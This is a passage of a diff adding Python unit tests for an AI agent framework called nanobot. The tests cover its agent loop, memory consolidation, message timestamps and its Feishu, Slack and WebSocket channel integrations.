id="call_ask",
name="ask_user",
arguments={
"question": "Install the optional package?",
"options": ["Install", "Skip"],
},
)
],
)
loop = AgentLoop(
bus=MessageBus(),
provider=_make_provider(chat_with_retry),
workspace=tmp_path,
model="test-model",
)
response = await loop._process_message(
InboundMessage(channel="websocket", sender_id="user", chat_id="123", content="set it up")
)
assert response is not None
assert response.content == "Install the optional package?"
assert response.buttons == [["Install", "Skip"]]

View File

@ -0,0 +1,108 @@
"""Tests for configurable consolidation_ratio."""
from unittest.mock import AsyncMock, MagicMock
import pytest
from pydantic import ValidationError
import nanobot.agent.memory as memory_module
from nanobot.agent.loop import AgentLoop
from nanobot.bus.queue import MessageBus
from nanobot.config.schema import AgentDefaults
from nanobot.providers.base import GenerationSettings, LLMResponse
def _make_loop(
tmp_path,
*,
estimated_tokens: int = 0,
context_window_tokens: int = 200,
consolidation_ratio: float = 0.5,
) -> AgentLoop:
provider = MagicMock()
provider.get_default_model.return_value = "test-model"
provider.generation = GenerationSettings(max_tokens=0)
provider.estimate_prompt_tokens.return_value = (estimated_tokens, "test-counter")
_response = LLMResponse(content="ok", tool_calls=[])
provider.chat_with_retry = AsyncMock(return_value=_response)
provider.chat_stream_with_retry = AsyncMock(return_value=_response)
loop = AgentLoop(
bus=MessageBus(),
provider=provider,
workspace=tmp_path,
model="test-model",
context_window_tokens=context_window_tokens,
consolidation_ratio=consolidation_ratio,
)
loop.tools.get_definitions = MagicMock(return_value=[])
loop.consolidator._SAFETY_BUFFER = 0
return loop
def _session_with_turns(loop: AgentLoop, *, turns: int):
session = loop.sessions.get_or_create("cli:test")
session.messages = []
for i in range(turns):
session.messages.append({"role": "user", "content": f"u{i}", "timestamp": f"2026-01-01T00:00:{i:02d}"})
session.messages.append({"role": "assistant", "content": f"a{i}", "timestamp": f"2026-01-01T00:01:{i:02d}"})
loop.sessions.save(session)
return session
@pytest.mark.asyncio
@pytest.mark.parametrize(
("ratio", "context_window_tokens", "estimates", "expected_archives"),
[
(0.5, 200, [250, 90], 1),
(0.1, 1000, [1200, 800, 400, 50], 2),
(0.9, 200, [300, 175], 1),
],
)
async def test_consolidation_ratio_controls_target(
tmp_path,
monkeypatch,
ratio: float,
context_window_tokens: int,
estimates: list[int],
expected_archives: int,
) -> None:
loop = _make_loop(
tmp_path,
context_window_tokens=context_window_tokens,
consolidation_ratio=ratio,
)
loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign]
session = _session_with_turns(loop, turns=10)
remaining_estimates = list(estimates)
def mock_estimate(_session, *, session_summary=None):
assert session_summary is None
return (remaining_estimates.pop(0), "test")
loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign]
monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100)
await loop.consolidator.maybe_consolidate_by_tokens(session)
assert loop.consolidator.archive.await_count == expected_archives
def test_ratio_propagated_from_config_schema() -> None:
defaults = AgentDefaults()
assert defaults.consolidation_ratio == 0.5
defaults = AgentDefaults.model_validate({"consolidationRatio": 0.3})
assert defaults.consolidation_ratio == 0.3
dumped = defaults.model_dump(by_alias=True)
assert dumped["consolidationRatio"] == 0.3
def test_ratio_validation_rejects_out_of_range() -> None:
with pytest.raises(ValidationError):
AgentDefaults(consolidation_ratio=0.05)
with pytest.raises(ValidationError):
AgentDefaults(consolidation_ratio=1.0)

View File

@ -188,6 +188,17 @@ def test_identity_has_no_behavioral_instructions(tmp_path) -> None:
assert "Execution Rules" not in identity
def test_system_prompt_does_not_warn_about_message_time_markers(tmp_path) -> None:
"""Parroting is prevented by not annotating assistant turns in history;
no prompt-level warning about ``[Message Time: ...]`` is needed."""
workspace = _make_workspace(tmp_path)
builder = ContextBuilder(workspace)
prompt = builder.build_system_prompt()
assert "Message Time" not in prompt
def test_default_soul_template_contains_execution_rules() -> None:
"""Default SOUL.md template must contain execution rules with act/plan layering."""
soul = (pkg_files("nanobot") / "templates" / "SOUL.md").read_text(encoding="utf-8")

View File

@ -535,7 +535,14 @@ async def test_system_subagent_followup_is_persisted_before_prompt_assembly(tmp_
)
non_system = [m for m in seen["initial_messages"] if m.get("role") != "system"]
assert [m["content"] for m in non_system[:2]] == ["question", "working"]
assert "question" in non_system[0]["content"]
assert "working" in non_system[1]["content"]
# User turns carry the timestamp prefix so the model can reason about
# relative time. Assistant turns do NOT, otherwise the model treats those
# past replies as in-context examples and starts its own outputs with
# ``[Message Time: ...]`` (which then leaks back to the user).
assert "[Message Time:" in non_system[0]["content"]
assert "[Message Time:" not in non_system[1]["content"]
assert non_system[2]["content"].count("subagent result") == 1
assert "Current Time:" in non_system[2]["content"]
@ -657,3 +664,63 @@ def test_subagent_followup_skips_empty_content() -> None:
assert loop._persist_subagent_followup(session, msg) is False
assert session.messages == []
def test_set_tool_context_passes_thread_session_key_to_spawn(tmp_path: Path) -> None:
loop = _make_full_loop(tmp_path)
loop._set_tool_context(
"slack",
"C123",
metadata={"slack": {"thread_ts": "1700.42", "channel_type": "channel"}},
session_key="slack:C123:1700.42",
)
spawn_tool = loop.tools.get("spawn")
assert spawn_tool is not None
assert spawn_tool._session_key.get() == "slack:C123:1700.42"
@pytest.mark.asyncio
async def test_system_subagent_followup_uses_thread_session_and_slack_metadata(tmp_path: Path) -> None:
loop = _make_full_loop(tmp_path)
loop.consolidator.maybe_consolidate_by_tokens = AsyncMock(return_value=False) # type: ignore[method-assign]
thread_session = loop.sessions.get_or_create("slack:C123:1700.42")
thread_session.add_message("user", "thread question")
loop.sessions.save(thread_session)
seen: dict[str, list[dict]] = {}
async def fake_run_agent_loop(initial_messages, **_kwargs):
seen["initial_messages"] = initial_messages
return (
"done",
[],
[*initial_messages, {"role": "assistant", "content": "done"}],
"stop",
False,
)
loop._run_agent_loop = fake_run_agent_loop # type: ignore[method-assign]
outbound = await loop._process_message(
InboundMessage(
channel="system",
sender_id="subagent",
chat_id="slack:C123",
content="subagent result",
session_key_override="slack:C123:1700.42",
metadata={"subagent_task_id": "sub-1"},
)
)
assert outbound is not None
assert outbound.channel == "slack"
assert outbound.chat_id == "C123"
assert outbound.metadata == {"slack": {"thread_ts": "1700.42"}}
assert "thread question" in seen["initial_messages"][1]["content"]
loop.sessions.invalidate("slack:C123:1700.42")
persisted = loop.sessions.get_or_create("slack:C123:1700.42")
assert any(m.get("subagent_task_id") == "sub-1" for m in persisted.messages)

View File

@ -0,0 +1,90 @@
from pathlib import Path
from unittest.mock import MagicMock
import pytest
from nanobot.agent.loop import AgentLoop
from nanobot.bus.queue import MessageBus
from nanobot.providers.base import LLMResponse, ToolCallRequest
class _ContextRecordingTool:
name = "cron"
concurrency_safe = False
def __init__(self) -> None:
self.contexts: list[dict] = []
def set_context(
self,
channel: str,
chat_id: str,
metadata: dict | None = None,
session_key: str | None = None,
) -> None:
self.contexts.append({
"channel": channel,
"chat_id": chat_id,
"metadata": metadata,
"session_key": session_key,
})
async def execute(self, **_kwargs) -> str:
return "created"
class _Tools:
def __init__(self, tool: _ContextRecordingTool) -> None:
self.tool = tool
def get(self, name: str):
return self.tool if name == "cron" else None
def get_definitions(self) -> list:
return []
def prepare_call(self, name: str, arguments: dict):
return (self.tool, arguments, None) if name == "cron" else (None, arguments, None)
@pytest.mark.asyncio
async def test_loop_hook_preserves_metadata_when_resetting_tool_context(tmp_path: Path) -> None:
provider = MagicMock()
calls = {"n": 0}
async def chat_with_retry(**_kwargs):
calls["n"] += 1
if calls["n"] == 1:
return LLMResponse(
content=None,
tool_calls=[ToolCallRequest(id="call_1", name="cron", arguments={"action": "add"})],
)
return LLMResponse(content="done", tool_calls=[])
provider.chat_with_retry = chat_with_retry
provider.get_default_model.return_value = "test-model"
loop = AgentLoop(
bus=MessageBus(),
provider=provider,
workspace=tmp_path,
model="test-model",
)
cron = _ContextRecordingTool()
loop.tools = _Tools(cron)
metadata = {"slack": {"thread_ts": "111.222", "channel_type": "channel"}}
await loop._run_agent_loop(
[],
channel="slack",
chat_id="C123",
metadata=metadata,
session_key="slack:C123:111.222",
)
assert cron.contexts[-1] == {
"channel": "slack",
"chat_id": "C123",
"metadata": metadata,
"session_key": "slack:C123:111.222",
}

View File

@ -1060,11 +1060,10 @@ async def test_next_turn_after_llm_error_keeps_turn_boundary(tmp_path):
request_messages = provider.chat_with_retry.await_args_list[1].kwargs["messages"]
non_system = [message for message in request_messages if message.get("role") != "system"]
assert non_system[0] == {"role": "user", "content": "first question"}
assert non_system[1] == {
"role": "assistant",
"content": _PERSISTED_MODEL_ERROR_PLACEHOLDER,
}
assert non_system[0]["role"] == "user"
assert "first question" in non_system[0]["content"]
assert non_system[1]["role"] == "assistant"
assert _PERSISTED_MODEL_ERROR_PLACEHOLDER in non_system[1]["content"]
assert non_system[2]["role"] == "user"
assert "second question" in non_system[2]["content"]

View File

@ -0,0 +1,49 @@
from pathlib import Path
from types import SimpleNamespace
from unittest.mock import MagicMock
from nanobot.agent.loop import AgentLoop
from nanobot.bus.queue import MessageBus
from nanobot.providers.factory import ProviderSnapshot
def _provider(default_model: str, max_tokens: int = 123) -> MagicMock:
provider = MagicMock()
provider.get_default_model.return_value = default_model
provider.generation = SimpleNamespace(max_tokens=max_tokens)
return provider
def test_provider_refresh_updates_all_model_dependents(tmp_path: Path) -> None:
old_provider = _provider("old-model")
new_provider = _provider("new-model", max_tokens=456)
loop = AgentLoop(
bus=MessageBus(),
provider=old_provider,
workspace=tmp_path,
model="old-model",
context_window_tokens=1000,
provider_snapshot_loader=lambda: ProviderSnapshot(
provider=new_provider,
model="new-model",
context_window_tokens=2000,
signature=("new-model",),
),
)
loop._refresh_provider_snapshot()
assert loop.provider is new_provider
assert loop.model == "new-model"
assert loop.context_window_tokens == 2000
assert loop.runner.provider is new_provider
assert loop.subagents.provider is new_provider
assert loop.subagents.model == "new-model"
assert loop.subagents.runner.provider is new_provider
assert loop.consolidator.provider is new_provider
assert loop.consolidator.model == "new-model"
assert loop.consolidator.context_window_tokens == 2000
assert loop.consolidator.max_completion_tokens == 456
assert loop.dream.provider is new_provider
assert loop.dream.model == "new-model"
assert loop.dream._runner.provider is new_provider

View File

@ -194,6 +194,87 @@ def test_get_history_preserves_reasoning_content():
]
def test_get_history_annotates_user_turns_but_not_assistant_turns():
"""Only user turns carry the timestamp prefix.
Annotating assistant turns trains the model (via in-context examples) to
start its own replies with ``[Message Time: ...]``. User-side stamps are
enough to pin adjacent assistant replies for relative-time reasoning.
"""
session = Session(key="test:timestamps")
session.messages.append({
"role": "user",
"content": "10 点提醒是昨天发生的",
"timestamp": "2026-04-26T22:00:00",
})
session.messages.append({
"role": "assistant",
"content": "记下来了",
"timestamp": "2026-04-26T22:00:05",
})
history = session.get_history(max_messages=500, include_timestamps=True)
assert history == [
{
"role": "user",
"content": "[Message Time: 2026-04-26T22:00:00]\n10 点提醒是昨天发生的",
},
{
"role": "assistant",
"content": "记下来了",
},
]
def test_get_history_annotates_proactive_assistant_deliveries_with_timestamps():
"""Cron / heartbeat assistant pushes still carry a timestamp prefix.
These proactive deliveries can sit hours away from the next user reply,
so the model needs to know when they fired. They are rare enough that
they don't act as in-context demonstrations encouraging the model to
prefix its own normal replies with ``[Message Time: ...]``.
"""
session = Session(key="test:proactive-timestamps")
session.messages.append({
"role": "assistant",
"content": "记得喝水",
"timestamp": "2026-04-26T15:00:00",
"_channel_delivery": True,
})
session.messages.append({
"role": "user",
"content": "",
"timestamp": "2026-04-26T18:00:00",
})
history = session.get_history(max_messages=500, include_timestamps=True)
assert history == [
{
"role": "assistant",
"content": "[Message Time: 2026-04-26T15:00:00]\n记得喝水",
},
{
"role": "user",
"content": "[Message Time: 2026-04-26T18:00:00]\n",
},
]
def test_get_history_does_not_annotate_tool_results_with_timestamps():
session = Session(key="test:tool-timestamps")
session.messages.append({"role": "user", "content": "run tool"})
session.messages.extend(_tool_turn("ts", 0))
session.messages[-1]["timestamp"] = "2026-04-26T22:00:10"
history = session.get_history(max_messages=500, include_timestamps=True)
tool_result = history[-1]
assert tool_result["role"] == "tool"
assert tool_result["content"] == "ok"
# --- Window cuts mid-group: assistant present but some tool results orphaned ---
def test_window_cuts_mid_tool_group():

View File

@ -1,6 +1,6 @@
"""Tests for Feishu reaction add/remove and auto-cleanup on stream end."""
from types import SimpleNamespace
from unittest.mock import AsyncMock, MagicMock, patch
from unittest.mock import AsyncMock, MagicMock
import pytest
@ -160,19 +160,38 @@ class TestRemoveReactionAsync:
class TestStreamEndReactionCleanup:
@pytest.mark.asyncio
async def test_stream_buffers_are_scoped_by_message_id(self):
ch = _make_channel()
ch._create_streaming_card_sync = MagicMock(return_value=None)
await ch.send_delta(
"oc_chat1", "first",
metadata={"message_id": "om_first"},
)
await ch.send_delta(
"oc_chat1", "second",
metadata={"message_id": "om_second"},
)
assert ch._stream_bufs["om_first"].text == "first"
assert ch._stream_bufs["om_second"].text == "second"
assert "oc_chat1" not in ch._stream_bufs
@pytest.mark.asyncio
async def test_removes_reaction_on_stream_end(self):
ch = _make_channel()
ch._stream_bufs["oc_chat1"] = _FeishuStreamBuf(
text="Done", card_id="card_1", sequence=3, last_edit=0.0,
)
ch._reaction_ids["om_001"] = "rx_42"
ch._client.cardkit.v1.card_element.content.return_value = MagicMock(success=MagicMock(return_value=True))
ch._client.cardkit.v1.card.settings.return_value = MagicMock(success=MagicMock(return_value=True))
ch._remove_reaction = AsyncMock()
await ch.send_delta(
"oc_chat1", "",
metadata={"_stream_end": True, "message_id": "om_001", "reaction_id": "rx_42"},
metadata={"_stream_end": True, "message_id": "om_001"},
)
ch._remove_reaction.assert_called_once_with("om_001", "rx_42")
@ -189,7 +208,7 @@ class TestStreamEndReactionCleanup:
await ch.send_delta(
"oc_chat1", "",
metadata={"_stream_end": True, "reaction_id": "rx_42"},
metadata={"_stream_end": True},
)
ch._remove_reaction.assert_not_called()

View File

@ -3,7 +3,7 @@ import asyncio
import json
from pathlib import Path
from types import SimpleNamespace
from unittest.mock import MagicMock, patch
from unittest.mock import AsyncMock, MagicMock, patch
import pytest
@ -21,18 +21,18 @@ from nanobot.bus.events import OutboundMessage
from nanobot.bus.queue import MessageBus
from nanobot.channels.feishu import FeishuChannel, FeishuConfig
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _make_feishu_channel(reply_to_message: bool = False) -> FeishuChannel:
def _make_feishu_channel(reply_to_message: bool = False, group_policy: str = "mention") -> FeishuChannel:
config = FeishuConfig(
enabled=True,
app_id="cli_test",
app_secret="secret",
allow_from=["*"],
reply_to_message=reply_to_message,
group_policy=group_policy,
)
channel = FeishuChannel(config, MessageBus())
channel._client = MagicMock()
@ -443,3 +443,288 @@ async def test_on_message_no_extra_api_call_when_no_parent_id() -> None:
channel._client.im.v1.message.get.assert_not_called()
assert len(captured) == 1
# ---------------------------------------------------------------------------
# Session key derivation tests
# ---------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_session_key_group_with_root_id_is_thread_scoped() -> None:
"""Group message with root_id gets a thread-scoped session key."""
channel = _make_feishu_channel(group_policy="open")
bus_spy = []
original_publish = channel.bus.publish_inbound
async def capture(msg):
bus_spy.append(msg)
await original_publish(msg)
channel.bus.publish_inbound = capture
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
channel.transcribe_audio = AsyncMock(return_value="")
channel._add_reaction = AsyncMock(return_value=None)
event = _make_feishu_event(
chat_type="group",
content='{"text": "hello"}',
root_id="om_root123",
message_id="om_child456",
)
await channel._on_message(event)
assert len(bus_spy) == 1
assert bus_spy[0].session_key == "feishu:oc_abc:om_root123"
@pytest.mark.asyncio
async def test_session_key_group_no_root_id_uses_message_id() -> None:
"""Group message without root_id gets session keyed by message_id (per-message session)."""
channel = _make_feishu_channel(group_policy="open")
bus_spy = []
original_publish = channel.bus.publish_inbound
async def capture(msg):
bus_spy.append(msg)
await original_publish(msg)
channel.bus.publish_inbound = capture
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
channel.transcribe_audio = AsyncMock(return_value="")
channel._add_reaction = AsyncMock(return_value=None)
event = _make_feishu_event(
chat_type="group",
content='{"text": "hello"}',
root_id=None,
message_id="om_001",
)
await channel._on_message(event)
assert len(bus_spy) == 1
assert bus_spy[0].session_key == "feishu:oc_abc:om_001"
@pytest.mark.asyncio
async def test_session_key_private_chat_no_override() -> None:
"""Private chat never overrides session key (consistent with Telegram/Slack)."""
channel = _make_feishu_channel()
bus_spy = []
original_publish = channel.bus.publish_inbound
async def capture(msg):
bus_spy.append(msg)
await original_publish(msg)
channel.bus.publish_inbound = capture
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
channel.transcribe_audio = AsyncMock(return_value="")
channel._add_reaction = AsyncMock(return_value=None)
event = _make_feishu_event(
chat_type="p2p",
content='{"text": "hello"}',
root_id=None,
message_id="om_001",
)
await channel._on_message(event)
assert len(bus_spy) == 1
assert bus_spy[0].session_key_override is None
# ---------------------------------------------------------------------------
# reply_in_thread tests
# ---------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_reply_uses_reply_in_thread_when_enabled() -> None:
"""When reply_to_message is True, reply includes reply_in_thread=True."""
channel = _make_feishu_channel(reply_to_message=True)
reply_resp = MagicMock()
reply_resp.success.return_value = True
channel._client.im.v1.message.reply.return_value = reply_resp
await channel.send(OutboundMessage(
channel="feishu",
chat_id="oc_abc",
content="hello",
metadata={"message_id": "om_001"},
))
channel._client.im.v1.message.reply.assert_called_once()
call_args = channel._client.im.v1.message.reply.call_args
request = call_args[0][0]
assert request.request_body.reply_in_thread is True
@pytest.mark.asyncio
async def test_reply_without_reply_in_thread_when_disabled() -> None:
"""When reply_to_message is False, reply does NOT use reply_in_thread."""
channel = _make_feishu_channel(reply_to_message=False)
create_resp = MagicMock()
create_resp.success.return_value = True
channel._client.im.v1.message.create.return_value = create_resp
await channel.send(OutboundMessage(
channel="feishu",
chat_id="oc_abc",
content="hello",
))
# No message_id in metadata → no reply attempt, direct create
channel._client.im.v1.message.create.assert_called_once()
@pytest.mark.asyncio
async def test_reply_keeps_fallback_when_reply_fails() -> None:
"""Even with reply_to_message=True, fallback to create on reply failure."""
channel = _make_feishu_channel(reply_to_message=True)
reply_resp = MagicMock()
reply_resp.success.return_value = False
reply_resp.code = 99991400
reply_resp.msg = "rate limited"
channel._client.im.v1.message.reply.return_value = reply_resp
create_resp = MagicMock()
create_resp.success.return_value = True
channel._client.im.v1.message.create.return_value = create_resp
await channel.send(OutboundMessage(
channel="feishu",
chat_id="oc_abc",
content="hello",
metadata={"message_id": "om_001"},
))
channel._client.im.v1.message.reply.assert_called()
channel._client.im.v1.message.create.assert_called()
@pytest.mark.asyncio
async def test_reply_no_reply_in_thread_for_p2p_chat() -> None:
"""reply_in_thread should NOT be set for p2p chats (identified by chat_type)."""
channel = _make_feishu_channel(reply_to_message=True)
reply_resp = MagicMock()
reply_resp.success.return_value = True
channel._client.im.v1.message.reply.return_value = reply_resp
await channel.send(OutboundMessage(
channel="feishu",
chat_id="oc_abc", # p2p chats also use oc_ prefix
content="hello",
metadata={"message_id": "om_001", "chat_type": "p2p"},
))
channel._client.im.v1.message.reply.assert_called_once()
call_args = channel._client.im.v1.message.reply.call_args
request = call_args[0][0]
assert request.request_body.reply_in_thread is not True
@pytest.mark.asyncio
async def test_reply_uses_reply_in_thread_for_group_chat() -> None:
"""reply_in_thread should be True for group chats (identified by chat_type)."""
channel = _make_feishu_channel(reply_to_message=True)
reply_resp = MagicMock()
reply_resp.success.return_value = True
channel._client.im.v1.message.reply.return_value = reply_resp
await channel.send(OutboundMessage(
channel="feishu",
chat_id="oc_abc",
content="hello",
metadata={"message_id": "om_001", "chat_type": "group"},
))
channel._client.im.v1.message.reply.assert_called_once()
call_args = channel._client.im.v1.message.reply.call_args
request = call_args[0][0]
assert request.request_body.reply_in_thread is True
@pytest.mark.asyncio
async def test_reply_targets_message_id_when_in_topic() -> None:
"""When inbound message is inside a topic (root_id != message_id),
the reply should target the inbound message_id (not root_id).
The Feishu Reply API keeps the response in the same topic
automatically when the target message is already inside a topic."""
channel = _make_feishu_channel(reply_to_message=True)
reply_resp = MagicMock()
reply_resp.success.return_value = True
channel._client.im.v1.message.reply.return_value = reply_resp
await channel.send(OutboundMessage(
channel="feishu",
chat_id="oc_abc",
content="hello",
metadata={
"message_id": "om_child456",
"chat_type": "group",
"root_id": "om_root123",
},
))
channel._client.im.v1.message.reply.assert_called_once()
call_args = channel._client.im.v1.message.reply.call_args
request = call_args[0][0]
# Should reply to the inbound message_id, not the root
assert request.message_id == "om_child456"
assert request.request_body.reply_in_thread is True
def test_on_reaction_added_stores_reaction_id() -> None:
"""_on_reaction_added stores the returned reaction_id in _reaction_ids."""
channel = _make_feishu_channel()
loop = asyncio.new_event_loop()
try:
task = loop.create_task(asyncio.sleep(0, result="reaction_abc"))
loop.run_until_complete(task)
channel._on_reaction_added("om_001", task)
finally:
loop.close()
assert channel._reaction_ids["om_001"] == "reaction_abc"
def test_on_reaction_added_skips_none_result() -> None:
"""_on_reaction_added does not store None results."""
channel = _make_feishu_channel()
loop = asyncio.new_event_loop()
try:
task = loop.create_task(asyncio.sleep(0, result=None))
loop.run_until_complete(task)
channel._on_reaction_added("om_001", task)
finally:
loop.close()
assert "om_001" not in channel._reaction_ids
def test_on_background_task_done_removes_from_set() -> None:
"""_on_background_task_done removes task from tracking set."""
channel = _make_feishu_channel()
loop = asyncio.new_event_loop()
try:
async def _fail():
raise RuntimeError("test failure")
task = loop.create_task(_fail())
channel._background_tasks.add(task)
try:
loop.run_until_complete(task)
except RuntimeError:
pass # expected
channel._on_background_task_done(task)
finally:
loop.close()
assert task not in channel._background_tasks

View File

@ -1,5 +1,9 @@
from __future__ import annotations
from types import SimpleNamespace
from unittest.mock import AsyncMock
import httpx
import pytest
# Check optional Slack dependencies before running tests
@ -10,7 +14,7 @@ except ImportError:
from nanobot.bus.events import OutboundMessage
from nanobot.bus.queue import MessageBus
from nanobot.channels.slack import SlackChannel, SlackConfig
from nanobot.channels.slack import SLACK_MAX_MESSAGE_LEN, SlackChannel, SlackConfig
class _FakeAsyncWebClient:
@ -20,26 +24,30 @@ class _FakeAsyncWebClient:
self.reactions_add_calls: list[dict[str, object | None]] = []
self.reactions_remove_calls: list[dict[str, object | None]] = []
self.conversations_list_calls: list[dict[str, object | None]] = []
self.conversations_replies_calls: list[dict[str, object | None]] = []
self.users_list_calls: list[dict[str, object | None]] = []
self.conversations_open_calls: list[dict[str, object | None]] = []
self._conversations_pages: list[dict[str, object]] = []
self._conversations_replies_response: dict[str, object] = {"messages": []}
self._users_pages: list[dict[str, object]] = []
self._open_dm_response: dict[str, object] = {"channel": {"id": "D_OPENED"}}
async def chat_postMessage(
async def chat_postMessage( # noqa: N802 - mirrors Slack SDK method name
self,
*,
channel: str,
text: str,
thread_ts: str | None = None,
blocks: list[dict[str, object]] | None = None,
) -> None:
self.chat_post_calls.append(
{
"channel": channel,
"text": text,
"thread_ts": thread_ts,
}
)
call: dict[str, object | None] = {
"channel": channel,
"text": text,
"thread_ts": thread_ts,
}
if blocks is not None:
call["blocks"] = blocks
self.chat_post_calls.append(call)
async def files_upload_v2(
self,
@ -92,6 +100,10 @@ class _FakeAsyncWebClient:
return self._conversations_pages.pop(0)
return {"channels": [], "response_metadata": {"next_cursor": ""}}
async def conversations_replies(self, **kwargs):
self.conversations_replies_calls.append(kwargs)
return self._conversations_replies_response
async def users_list(self, **kwargs):
self.users_list_calls.append(kwargs)
if self._users_pages:
@ -149,6 +161,61 @@ async def test_send_omits_thread_for_dm_messages() -> None:
assert fake_web.file_upload_calls[0]["thread_ts"] is None
@pytest.mark.asyncio
async def test_send_splits_long_messages() -> None:
channel = SlackChannel(SlackConfig(enabled=True), MessageBus())
fake_web = _FakeAsyncWebClient()
channel._web_client = fake_web
await channel.send(
OutboundMessage(
channel="slack",
chat_id="C123",
content="x" * (SLACK_MAX_MESSAGE_LEN + 10),
)
)
assert len(fake_web.chat_post_calls) == 2
assert all(len(str(call["text"])) <= SLACK_MAX_MESSAGE_LEN for call in fake_web.chat_post_calls)
@pytest.mark.asyncio
async def test_send_renders_buttons_on_last_message_chunk() -> None:
channel = SlackChannel(SlackConfig(enabled=True), MessageBus())
fake_web = _FakeAsyncWebClient()
channel._web_client = fake_web
await channel.send(
OutboundMessage(
channel="slack",
chat_id="C123",
content="Choose one",
buttons=[["Yes", "No"]],
)
)
assert len(fake_web.chat_post_calls) == 1
blocks = fake_web.chat_post_calls[0]["blocks"]
assert isinstance(blocks, list)
assert blocks[-1] == {
"type": "actions",
"elements": [
{
"type": "button",
"text": {"type": "plain_text", "text": "Yes"},
"value": "Yes",
"action_id": "ask_user_Yes",
},
{
"type": "button",
"text": {"type": "plain_text", "text": "No"},
"value": "No",
"action_id": "ask_user_No",
},
],
}
@pytest.mark.asyncio
async def test_send_updates_reaction_when_final_response_sent() -> None:
channel = SlackChannel(SlackConfig(enabled=True, react_emoji="eyes"), MessageBus())
@ -316,3 +383,143 @@ async def test_send_raises_when_named_target_cannot_be_resolved() -> None:
content="hello",
)
)
@pytest.mark.asyncio
async def test_with_thread_context_fetches_root_once() -> None:
channel = SlackChannel(SlackConfig(enabled=True), MessageBus())
channel._bot_user_id = "UBOT"
fake_web = _FakeAsyncWebClient()
fake_web._conversations_replies_response = {
"messages": [
{"ts": "111.000", "user": "UROOT", "text": "drink water"},
{"ts": "112.000", "user": "U2", "text": "good idea"},
{"ts": "112.500", "user": "UBOT", "text": "I'll remind you."},
{"ts": "113.000", "user": "U3", "text": "<@UBOT> what did you see?"},
]
}
channel._web_client = fake_web
content = await channel._with_thread_context(
"what did you see?",
chat_id="C123",
channel_type="channel",
thread_ts="111.000",
raw_thread_ts="111.000",
current_ts="113.000",
)
assert fake_web.conversations_replies_calls == [
{"channel": "C123", "ts": "111.000", "limit": 20}
]
assert "Slack thread context before this mention:" in content
assert "- <@UROOT>: drink water" in content
assert "- <@U2>: good idea" in content
assert "- bot: I'll remind you." in content
assert "U3" not in content
assert content.endswith("Current message:\nwhat did you see?")
second = await channel._with_thread_context(
"again",
chat_id="C123",
channel_type="channel",
thread_ts="111.000",
raw_thread_ts="111.000",
current_ts="114.000",
)
assert second == "again"
assert len(fake_web.conversations_replies_calls) == 1
@pytest.mark.asyncio
async def test_slack_slash_command_skips_thread_context() -> None:
channel = SlackChannel(SlackConfig(enabled=True, allow_from=[]), MessageBus())
channel._bot_user_id = "UBOT"
channel._with_thread_context = AsyncMock(return_value="wrapped") # type: ignore[method-assign]
channel._handle_message = AsyncMock() # type: ignore[method-assign]
client = SimpleNamespace(send_socket_mode_response=AsyncMock())
req = SimpleNamespace(
type="events_api",
envelope_id="env-1",
payload={
"event": {
"type": "app_mention",
"user": "U1",
"channel": "C123",
"text": "<@UBOT> /restart",
"thread_ts": "111.000",
"ts": "112.000",
}
},
)
await channel._on_socket_request(client, req)
channel._with_thread_context.assert_not_awaited()
channel._handle_message.assert_awaited_once()
assert channel._handle_message.await_args.kwargs["content"] == "/restart"
@pytest.mark.asyncio
async def test_slack_file_share_downloads_media_and_reaches_agent() -> None:
channel = SlackChannel(SlackConfig(enabled=True, bot_token="xoxb-test"), MessageBus())
channel._bot_user_id = "UBOT"
channel._web_client = _FakeAsyncWebClient()
channel._handle_message = AsyncMock() # type: ignore[method-assign]
channel._download_slack_file = AsyncMock( # type: ignore[method-assign]
return_value=("/tmp/report.pdf", "[file: report.pdf]")
)
client = SimpleNamespace(send_socket_mode_response=AsyncMock())
req = SimpleNamespace(
type="events_api",
envelope_id="env-file",
payload={
"event": {
"type": "message",
"subtype": "file_share",
"user": "U1",
"channel": "D123",
"channel_type": "im",
"text": "please read this",
"ts": "1700000000.000100",
"files": [
{
"id": "F123",
"name": "report.pdf",
"mimetype": "application/pdf",
"url_private_download": "https://files.slack.com/report.pdf",
}
],
}
},
)
await channel._on_socket_request(client, req)
channel._download_slack_file.assert_awaited_once()
channel._handle_message.assert_awaited_once()
kwargs = channel._handle_message.await_args.kwargs
assert kwargs["content"] == "please read this\n[file: report.pdf]"
assert kwargs["media"] == ["/tmp/report.pdf"]
def test_slack_download_rejects_login_html() -> None:
html_response = httpx.Response(
200,
headers={"content-type": "text/html; charset=utf-8"},
content=b"<!doctype html><html><title>Sign in to Slack</title>",
)
markdown_response = httpx.Response(
200,
headers={"content-type": "text/markdown"},
content=b"# PR Extraction Guide\n",
)
assert SlackChannel._looks_like_html_download(html_response) is True
assert SlackChannel._looks_like_html_download(markdown_response) is False
def test_slack_channel_uses_channel_aware_allow_policy() -> None:
channel = SlackChannel(SlackConfig(enabled=True, allow_from=[]), MessageBus())
assert channel.is_allowed("U1") is True
assert channel._is_allowed("U1", "C123", "channel") is True

View File

@ -26,6 +26,8 @@ from nanobot.channels.websocket import (
_parse_query,
_parse_request_path,
)
from nanobot.config.loader import load_config, save_config
from nanobot.config.schema import Config
# -- Shared helpers (aligned with test_websocket_integration.py) ---------------
@ -178,6 +180,7 @@ async def test_send_delivers_json_message_with_media_and_reply() -> None:
content="hello",
reply_to="m1",
media=["/tmp/a.png"],
buttons=[["Yes", "No"]],
)
await channel.send(msg)
@ -185,9 +188,11 @@ async def test_send_delivers_json_message_with_media_and_reply() -> None:
payload = json.loads(mock_ws.send.call_args[0][0])
assert payload["event"] == "message"
assert payload["chat_id"] == "chat-1"
assert payload["text"] == "hello"
assert payload["text"] == "hello\n\n1. Yes\n2. No"
assert payload["button_prompt"] == "hello"
assert payload["reply_to"] == "m1"
assert payload["media"] == ["/tmp/a.png"]
assert payload["buttons"] == [["Yes", "No"]]
@pytest.mark.asyncio
@ -436,6 +441,72 @@ async def test_http_route_issues_token_then_websocket_requires_it(bus: MagicMock
await server_task
@pytest.mark.asyncio
